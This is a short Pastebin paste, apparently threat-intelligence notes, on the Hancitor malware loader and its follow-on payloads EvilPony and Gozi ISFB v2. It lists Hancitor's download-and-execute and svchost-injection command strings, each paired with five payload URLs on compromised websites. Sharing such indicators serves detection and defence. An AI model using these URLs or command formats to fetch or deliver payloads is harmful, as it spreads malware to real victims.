Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Source: https://twitter.com/James_inthe_box/status/1072868992337948672
- Hancitor
- -> EvilPony
- -> Gozi ISFB v2
- Hancitor Payload Domains:
- // l -> Download and execute .EXE in separate thread (arg=1)
- {l:http://skolanovavesnn.cz/wp-admin/1|http://zs11.koszalin.pl/wp-admin/includes/1|http://primagamahomeschool.com/wp-includes/1|http://billionaires-indo.com/coba1/1|http://talismanchallenge.com/wp-content/uploads/2018/1}
- // b -> Download and inject code into svchost.exe
- {b:http://skolanovavesnn.cz/wp-admin/2|http://zs11.koszalin.pl/wp-admin/includes/2|http://primagamahomeschool.com/wp-includes/2|http://billionaires-indo.com/coba1/2|http://talismanchallenge.com/wp-content/uploads/2018/2}
- // r -> Download and execute .DLL or .EXE
- {r:http://skolanovavesnn.cz/wp-admin/33|http://zs11.koszalin.pl/wp-admin/includes/33|http://primagamahomeschool.com/wp-includes/33|http://billionaires-indo.com/coba1/33|http://talismanchallenge.com/wp-content/uploads/2018/33}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
